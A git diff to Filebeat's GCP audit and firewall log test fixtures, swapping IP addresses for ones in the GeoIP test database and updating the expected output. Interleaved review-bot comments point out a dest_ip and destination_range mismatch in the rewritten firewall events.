-{"insertId":"-c7ctxmd2zab","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"id":"operation-1596646123456-5ac2438b775f6-f8ca1382-e70b6831","last":true,"producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"methodName":"beta.compute.instances.stop","request":{"@type":"type.googleapis.com/compute.instances.stop"},"requestMetadata":{"callerIp":"2.3.4.5","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 
Firefox/79.0,gzip(gfe),gzip(gfe)"},"resourceName":"projects/foo/zones/us-central1-a/instances/win10-test","serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T16:56:41.315135528Z","resource":{"labels":{"instance_id":"590261181","project_id":"foo","zone":"us-central1-a"},"type":"gce_instance"},"severity":"NOTICE","timestamp":"2020-08-05T16:56:40.428Z"} +{"insertId":"v2spcwdzmc2","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"first":true,"id":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"authorizationInfo":[{"granted":true,"permission":"compute.images.create","resourceAttributes":{"name":"projects/foo/global/images/windows-server-2016-v20200805","service":"compute","type":"compute.images"}}],"methodName":"v1.compute.images.insert","request":{"@type":"type.googleapis.com/compute.images.insert","family":"windows-server-2016","guestOsFeatures":[{"type":"VIRTIO_SCSI_MULTIQUEUE"},{"type":"WINDOWS"}],"name":"windows-server-2016-v20200805","rawDisk":{"source":"https://storage.googleapis.com/storage/v1/b/foo/o/windows-server-2016-v20200805.tar.gz"},"sourceType":"RAW"},"requestMetadata":{"callerIp":"81.2.69.143","callerSuppliedUserAgent":"google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 
19.6.0),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2020-08-05T21:59:27.515Z"}},"resourceLocation":{"currentLocations":["eu"]},"resourceName":"projects/foo/global/images/windows-server-2016-v20200805","response":{"@type":"type.googleapis.com/operation","id":"44919313","insertTime":"2020-08-05T14:59:27.259-07:00","name":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","operationType":"insert","progress":"0","selfLink":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/operation-1596664766354-5ac287c395484-fa3923bd-543e018e","selfLinkWithId":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/4491931805423146320","startTime":"2020-08-05T14:59:27.274-07:00","status":"RUNNING","targetId":"12345","targetLink":"https://www.googleapis.com/compute/v1/projects/foo/global/images/windows-server-2016-v20200805","user":"user@mycompany.com"},"serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T21:59:27.822546978Z","resource":{"labels":{"image_id":"771879043","project_id":"foo"},"type":"gce_image"},"severity":"NOTICE","timestamp":"2020-08-05T21:59:26.456Z"} +{"insertId":"-c7ctxmd2zab","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"id":"operation-1596646123456-5ac2438b775f6-f8ca1382-e70b6831","last":true,"producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"methodName":"beta.compute.instances.stop","request":{"@type":"type.googleapis.com/compute.instances.stop"},"requestMetadata":{"callerIp":"67.43.156.12","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 
Firefox/79.0,gzip(gfe),gzip(gfe)"},"resourceName":"projects/foo/zones/us-central1-a/instances/win10-test","serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T16:56:41.315135528Z","resource":{"labels":{"instance_id":"590261181","project_id":"foo","zone":"us-central1-a"},"type":"gce_instance"},"severity":"NOTICE","timestamp":"2020-08-05T16:56:40.428Z"} {"insertId":"94170ac4-6e82-4345-98ad-3c780222d19d","labels":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":""},"logName":"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access","operation":{"first":true,"id":"94170ac4-6e82-4345-98ad-3c780222d19d","last":true,"producer":"k8s.io"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"granted":true,"permission":"io.k8s.core.v1.nodes.list","resource":"core/v1/nodes"}],"methodName":"io.k8s.core.v1.nodes.list","requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"GoogleCloudConsole"},"resourceName":"core/v1/nodes","serviceName":"k8s.io","status":{}},"receiveTimestamp":"2021-04-23T14:47:31.94822935Z","resource":{"labels":{"cluster_name":"analysis-cluster","location":"us-central1-a","project_id":"elastic-siem"},"type":"k8s_cluster"},"timestamp":"2021-04-23T14:47:07.535383Z"} 
{"insertId":"b10a904a-faa4-4e0d-9ec3-7bc6a180196a","labels":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":"","k8s.io/deprecated":"true","k8s.io/removed-release":"1.22"},"logName":"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access","operation":{"first":true,"id":"b10a904a-faa4-4e0d-9ec3-7bc6a180196a","last":true,"producer":"k8s.io"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"granted":true,"permission":"io.k8s.extensions.v1beta1.ingresses.list","resource":"extensions/v1beta1/namespaces/cos-auditd/ingresses"}],"methodName":"io.k8s.extensions.v1beta1.ingresses.list","requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"GoogleCloudConsole"},"resourceName":"extensions/v1beta1/namespaces/cos-auditd/ingresses","serviceName":"k8s.io","status":{}},"receiveTimestamp":"2021-04-23T14:16:36.37362467Z","resource":{"labels":{"cluster_name":"analysis-cluster","location":"us-central1-a","project_id":"elastic-siem"},"type":"k8s_cluster"},"timestamp":"2021-04-23T14:16:07.574776Z"} {"insertId":"e973134d-b4d5-4e2f-92b8-82bba13fdb92","labels":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":"RBAC: allowed by ClusterRoleBinding \"system:public-info-viewer\" of ClusterRole \"system:public-info-viewer\" to Group 
\"system:unauthenticated\""},"logName":"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access","operation":{"first":true,"id":"e973134d-b4d5-4e2f-92b8-82bba13fdb92","last":true,"producer":"k8s.io"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"system:anonymous"},"authorizationInfo":[{"granted":true,"permission":"io.k8s.get","resource":"readyz"}],"methodName":"io.k8s.get","requestMetadata":{"callerIp":"127.0.0.1","callerSuppliedUserAgent":"kube-probe/1.19+"},"resourceName":"readyz","serviceName":"k8s.io","status":{}},"receiveTimestamp":"2021-04-29T08:19:21.606980385Z","resource":{"labels":{"cluster_name":"analysis-cluster","location":"us-central1-a","project_id":"elastic-siem"},"type":"k8s_cluster"},"timestamp":"2021-04-29T08:19:20.80581Z"}
diff --git a/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log-expected.json b/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log-expected.json
index a25ec4fb1f3a..7e0a4d7f7dae 100644
--- a/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log-expected.json
+++ b/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log-expected.json
@@ -268,7 +268,7 @@
 "gcp.audit.method_name": "v1.compute.images.insert",
 "gcp.audit.request.name": "windows-server-2016-v20200805",
 "gcp.audit.request.proto_name": "type.googleapis.com/compute.images.insert",
- "gcp.audit.request_metadata.caller_ip": "1.2.3.4",
+ "gcp.audit.request_metadata.caller_ip": "81.2.69.143",
 "gcp.audit.request_metadata.caller_supplied_user_agent": "google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 19.6.0),gzip(gfe)",
 "gcp.audit.resource_location.current_locations": [
 "eu"
@@ -283,15 +283,15 @@
 "log.offset": 7530,
 "service.name": "compute.googleapis.com",
 "service.type": "gcp",
- "source.geo.city_name": "Moscow",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "RU",
- "source.geo.country_name": "Russia",
- "source.geo.location.lat": 55.7527,
- "source.geo.location.lon": 37.6172,
- "source.geo.region_iso_code": "RU-MOW",
- "source.geo.region_name": "Moscow",
- "source.ip": "1.2.3.4",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -317,27 +317,23 @@
 "gcp.audit.authentication_info.principal_email": "user@mycompany.com",
 "gcp.audit.method_name": "beta.compute.instances.stop",
 "gcp.audit.request.proto_name": "type.googleapis.com/compute.instances.stop",
- "gcp.audit.request_metadata.caller_ip": "2.3.4.5",
+ "gcp.audit.request_metadata.caller_ip": "67.43.156.12",
 "gcp.audit.request_metadata.caller_supplied_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0,gzip(gfe),gzip(gfe)",
 "gcp.audit.resource_name": "projects/foo/zones/us-central1-a/instances/win10-test",
 "gcp.audit.service_name": "compute.googleapis.com",
 "gcp.audit.type": "type.googleapis.com/google.cloud.audit.AuditLog",
 "input.type": "log",
 "log.logger": "projects/foo/logs/cloudaudit.googleapis.com%2Factivity",
- "log.offset": 9946,
+ "log.offset": 9950,
 "service.name": "compute.googleapis.com",
 "service.type": "gcp",
- "source.as.number": 3215,
- "source.as.organization.name": "Orange",
- "source.geo.city_name": "Clermont-Ferrand",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "FR",
- "source.geo.country_name": "France",
- "source.geo.location.lat": 45.7838,
- "source.geo.location.lon": 3.0966,
- "source.geo.region_iso_code": "FR-63",
- "source.geo.region_name": "Puy-de-D\u00f4me",
- "source.ip": "2.3.4.5",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "tags": [
 "forwarded"
 ],
@@ -376,7 +372,7 @@
 "gcp.audit.type": "type.googleapis.com/google.cloud.audit.AuditLog",
 "input.type": "log",
 "log.logger": "projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access",
- "log.offset": 10917,
+ "log.offset": 10926,
 "orchestrator.api_version": "v1",
 "orchestrator.cluster.name": "analysis-cluster",
 "orchestrator.resource.type": "nodes",
@@ -418,7 +414,7 @@
 "gcp.audit.type": "type.googleapis.com/google.cloud.audit.AuditLog",
 "input.type": "log",
 "log.logger": "projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access",
- "log.offset": 11897,
+ "log.offset": 11906,
 "orchestrator.api_version": "v1beta1",
 "orchestrator.cluster.name": "analysis-cluster",
 "orchestrator.namespace": "cos-auditd",
@@ -461,7 +457,7 @@
 "gcp.audit.type": "type.googleapis.com/google.cloud.audit.AuditLog",
 "input.type": "log",
 "log.logger": "projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access",
- "log.offset": 13040,
+ "log.offset": 13049,
 "orchestrator.cluster.name": "analysis-cluster",
 "orchestrator.resource.type": "readyz",
 "orchestrator.type": "kubernetes",
@@ -502,7 +498,7 @@
 "gcp.audit.type": "type.googleapis.com/google.cloud.audit.AuditLog",
 "input.type": "log",
 "log.logger": "projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access",
- "log.offset": 14123,
+ "log.offset": 14132,
 "orchestrator.api_version": "v1",
 "orchestrator.cluster.name": "analysis-cluster",
 "orchestrator.type": "kubernetes",
diff --git a/x-pack/filebeat/module/gcp/firewall/test/test.log b/x-pack/filebeat/module/gcp/firewall/test/test.log
index 28218d31fff4..724558ce1df5 100644
--- a/x-pack/filebeat/module/gcp/firewall/test/test.log
+++ b/x-pack/filebeat/module/gcp/firewall/test/test.log
@@ -1,4 +1,4 @@ -{"insertId":"4zuj4nfn4llkb","jsonPayload":{"connection":{"dest_ip":"8.8.8.8","dest_port":53,"protocol":17,"src_ip":"10.128.0.16","src_port":60094},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:35:24.466374097Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:35:17.214711274Z"} +{"insertId":"4zuj4nfn4llkb","jsonPayload":{"connection":{"dest_ip":"175.16.199.1","dest_port":53,"protocol":17,"src_ip":"10.128.0.16","src_port":60094},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:35:24.466374097Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:35:17.214711274Z"} 
{"insertId":"1f21ciqfpfssuo","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.0.2.126","src_port":64853},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"continent":"Asia","country":"omn"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-10-30T13:52:54.473174731Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":"2019-10-30T13:52:42.191988835Z"} {"insertId":"8vcfeailjd","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.219","src_port":2897},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Krasnodar","continent":"Europe","country":"rus","region":"Krasnodar 
Krai"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:31:22.738796433Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:31:19.421478847Z"} {"insertId":"1bqgmw9feiabij","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.14","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"Europe","country":"deu"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:41:35.727004321Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:41:31.079508196Z"} 
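Review bot: The rewritten first event in the `@@ -1,4 +1,4 @@` hunk changes `dest_ip` to 175.16.199.1 but leaves `rule_details.destination_range` as `["8.8.8.0/24"]`, so the fixture now records a DENY match on a destination that lies outside the rule's own range. If the intent is only to land on an address the GeoIP test database knows, the range should move with it, e.g. `"destination_range":["175.16.199.0/24"]` (constructed from the new address), so the event stays self-consistent for anyone checking the expected output against the rule. If the mismatch is deliberate, a short note in the module's test README or the PR description would spare the next reader a double-take. The `@@ -10,8 +10,8 @@` hunk that follows runs past the end of this view.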
@@ -10,8 +10,8 @@ {"insertId":"1y7e4yzff816cq","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:26.357446279Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:16.59353182Z"} {"insertId":"lx5jlsfggpr0q","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte 
d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:28.203068653Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:22.930570324Z"} {"insertId":"18ynfbufer19m1","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.200","src_port":42716},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"İzmir","continent":"Asia","country":"tur","region":"İzmir"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:32:14.038485761Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:32:07.407039908Z"} 
-{"insertId":"tzddthfsr6fv5","jsonPayload":{"connection":{"dest_ip":"8.8.8.8","dest_port":80,"protocol":6,"src_ip":"10.28.0.16","src_port":46418},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:41:28.971534988Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:41:20.972747063Z"} -{"insertId":"1k2b7kefsnhzq7","jsonPayload":{"connection":{"dest_ip":"8.8.8.8","dest_port":80,"protocol":17,"src_ip":"10.28.0.16","src_port":58725},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:42:33.671883883Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:42:26.50532921Z"} 
+{"insertId":"tzddthfsr6fv5","jsonPayload":{"connection":{"dest_ip":"175.16.199.1","dest_port":80,"protocol":6,"src_ip":"10.28.0.16","src_port":46418},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:41:28.971534988Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:41:20.972747063Z"} +{"insertId":"1k2b7kefsnhzq7","jsonPayload":{"connection":{"dest_ip":"175.16.199.1","dest_port":80,"protocol":17,"src_ip":"10.28.0.16","src_port":58725},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:42:33.671883883Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:42:26.50532921Z"} 
{"insertId":"1sdfuwxfk8hq1c","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":44666},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.531819246Z"} 
{"insertId":"1sdfuwxfk8hq1b","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":44668},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.551617516Z"} 
{"insertId":"yot1ojetjdiw","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.0.2.7","src_port":1683},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"city":"Almelo","continent":"Europe","country":"nld","region":"Overijssel"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:28.477733837Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:15.771161946Z"} diff --git a/x-pack/filebeat/module/gcp/firewall/test/test.log-expected.json b/x-pack/filebeat/module/gcp/firewall/test/test.log-expected.json index 0242fbd420ef..1ff0d0ad6b06 100644 --- a/x-pack/filebeat/module/gcp/firewall/test/test.log-expected.json +++ b/x-pack/filebeat/module/gcp/firewall/test/test.log-expected.json 
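Review bot: The two rewritten EGRESS events in the hunk beginning `@@ -10,8 +10,8 @@` now carry `"dest_ip":"175.16.199.1"` while `rule_details.destination_range` is still `["8.8.8.0/24"]`, so the fixture describes a DENY rule that could not have matched the connection it reports. A sample that contradicts itself is a poor reference for anyone building pipeline tests or detections against GCP firewall logs, and it no longer documents a realistic event. Presumably the address was changed to obtain stable geo enrichment from the bundled test GeoIP database; if so, `destination_range` should be updated to a prefix that contains the new address so the event stays internally consistent.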
@@ -1,15 +1,16 @@
 [
 {
 "@timestamp": "2019-11-12T12:35:17.214Z",
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
